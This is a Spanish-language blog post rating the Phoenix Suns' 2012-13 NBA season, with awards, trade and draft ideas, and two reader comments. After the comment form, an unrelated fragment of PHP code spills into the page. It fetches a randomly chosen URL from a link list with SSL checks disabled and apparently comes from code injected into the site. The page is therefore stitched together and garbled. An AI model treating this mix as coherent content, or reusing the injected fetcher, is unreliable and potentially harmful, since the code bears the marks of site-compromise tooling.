Phoenix Suns: Muy deficiente

27 de June de 2013 por Simon

Así es. Nadie esperaba que los Phoenix Suns lucharan por entrar en Play Off, ni siquiera se esperaba que consiguieran un buen número de victorias. Con que dieran la cara y crecieran como equipo bastaba pero nada de eso ocurrió. Casi nadie en Arizona rindió acorde a las expectativas y Phoenix en el año 1 después de Nash se convirtió  en el peor equipo de la conferencia Oeste y se postula como favorito para ser el peor equipo de la liga la temporada que viene si no median muchos cambios en la plantilla.

El equipo apostó fuerte por algunos jugadores jóvenes emergentes como Dragic, se confiaba en el supuesto talento de Michael Beasley y Wes Johnson y en la veteranía y el saber hacer de Luis Scola. Nada funcionó. Dragic no es un jugador que pueda liderar un equipo, Beasley y Johnson, lejos de mostrar un gran nivel, nos han hecho dudar de hasta si tienen un lugar en la liga, y Scola, a pesar de su buen hacer y su compromiso, ya ha iniciado la cuesta abajo.  De los jugadores que ya estaban en el equipo, Marcin Gortat ha jugado a un nivel decente aunque como es normal ha añorado muchísimo a Nash. Markieff Morris ha dado algunos síntomas de mejoría pero nunca pasará de ser un jugador de rol para completar minutos. El resto de integrantes del a plantilla de los Suns  apenas pasan de meros jugadores de rol por lo que poco o nada se puede comentar de ellos.

La temporada comenzó  de manera relativamente esperanzadora. En el primer mes de competición el equipo no estuvo lejos del 50% pero fue un espejismo. Enseguida el equipo comenzó  a cosechar derrotas que desembocaron la destitución de Alvin Gentry. En su lugar se contrató a Lindsay Hunter y  a partir de ahí comenzó una cuesta abajo constante. Si bien el porcentaje de victorias/derrotas se mantuvo estable, la actitud y juego del equipo no era igual y la temporada parecía eternizarse. Conforme pasaban las semanas eran menos capaces de competir y los jugadores que comenzaron bien la campaña iban hundiéndose cada vez más hasta el punto de terminar la temporada como el peor equipo del Oeste.

PREMIOS

MVP: Goran Dragic ha sido sin duda el mejor jugador de Phoenix esta temporada y eso nos da una idea del nivel de la plantilla de Phoenix. Sus casi 15 puntos y 7.4 asistencias son números más que buenos para un base de su categoría. Nadie esperaba que se convirtiera en jugador franquicia y así ha sido. Ni es ni será un jugador sobre el que reconstruir.

Rookie: Ningún rookie ha tenido un papel relevante en Phoenix esta temporada así que queda desierto este premio. La gran apuesta del Draft 2012, Kendall Marshall, ha confirmado lo que muchos anunciaban: estaba demasiado verde para dar el salto.

Sorpresa: Tristemente nadie ha sorprendido gratamente esta temporada en Phoenix aunque por momentos, Jermaine O’Neal ha vuelto a parecer un jugador de baloncesto.

Decepción: Si los dos premios anteriores los teníamos que dejar vacantes, aquí si tenemos merecidos ganadores. Wesley Johnson no ha demostrado absolutamente nada que haga merecer la pena ofrecerle un contrato, cada vez parece jugar peor. En cuanto a Michael Beasley, no hay manera, no encuentra su sitio en la liga. El supuesto talento que se le atribuía cada vez va siendo más supuesto y menos realidad. Lo peor para Phoenix es que aún le quedan dos años de contrato y al nivel mostrado van a ser un auténtico lastre.

Esfuerzo en vano: Aquí vamos a mencionar a Luis Scola. Un jugador de su talla y calidad merecería jugar sus últimos años buenos en un equipo mejor que este.

JUGANDO A GM

Cuando tienes una plantilla con muchos jugadores mediocres con contratos medios que no son expiring, traspasarlos es una tarea ardua. Dos cosas están claras, el contrato de Beasley nos lo tenemos que tragar y es imposible optar a algo a corto plazo. Así que los movimientos irán encaminados a conseguir jugadores jóvenes y/o elecciones del  Draft y mantener una buena situación económica.

  • Con un Draft tan impredecible como el de esta temporada es casi imposible prever que es lo que va a llegarnos al número 5. Con tantos agujeros en nuestra plantilla casi que cualquier jugador vendría bien. Estableciendo un orden de prioridades escogeremos a Noel, Oladipo o McLemore en ese orden. Salvo sorpresa uno de estos 3 nos llegará pues Porter y Bennet parece que no pasarán en ningún caso de Wizards y Bobcats respectivamente.
  • No renovar a Johnson. Bajo ninguna circunstancia.
  • Es un hecho que Gortat a poco que mantenga el nivel va a conseguir un buen contrato el año que viene por lo que su expiring nos podría valer para conseguir una primera ronda de Draft y algún jovencito, sobre todo si hemos conseguido a Noel. Febrero sería un buen momento para realizar algún traspaso ambicioso.
  • Apenas tenemos margen para los movimientos con semejante plantilla por lo que básicamente nuestra táctica es esperar y aguantar el chaparrón la temporada que viene y confiar en que la suerte del draft esté de nuestra parte el año que viene. Con una buena ronda y un espacio salarial grande podríamos realizar cosas interesantes.
Comenta

2 comentarios a esta entrada

  1. Esteban dice:
    #1

    comparto elñ general del analisis pero estoy en desacuerdo total con tu jugando al GM

    este equipo de phoenix todos juntos son horribles, pero por separado e individualmente para pensar en traspasos no esta nada mal

    en primer lugar dragic tiene un contrato muy bueno para un jugador de su categoria, y ni hablar scola que por 2 millones puede ser un sexto hombre envidiable en cualquier equipo competitivo
    y por ultimo tenemos a Gortat, un pivote de nivel y con un ecelente cofntrato y para mejor por solo un año
    mas dudley quien termino dejando buenas sensaciones con un contrato para un suplente respetable

    cualquiera de estos 4 son exelentemente traspasables por rondas de PO o a cambio de trade exeptions que hagan mas lugar en los linros para reconstruir

    el contrato de Beasley no es malo ni mucho menos, mala es su cabeza, pero no va a faltar quien lo considere un sexto hombre anotador desde el banco estilo lamar odom… por 7 millones y la potencialidad de ganarse una estrella, varios lo harian, incluso los pistons podrian estar interesados para completar la tripleta con un hombre diferente a monroe y drummond

    mientras que Frye… bueno al si hay q comerselo

      Citar

  2. Sancho88 dice:
    #2

    Phoenix son los Rockets del año pasado, un equipo por el que la próxima temporada nadie dará ni un duro, pero que habrá que ver cómo se mueven este verano. No sería descabellado apostar por JR. Smith, Monta Ellis o un jugador así que pueda liderar la ofensiva, un tirador de primer nivel.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>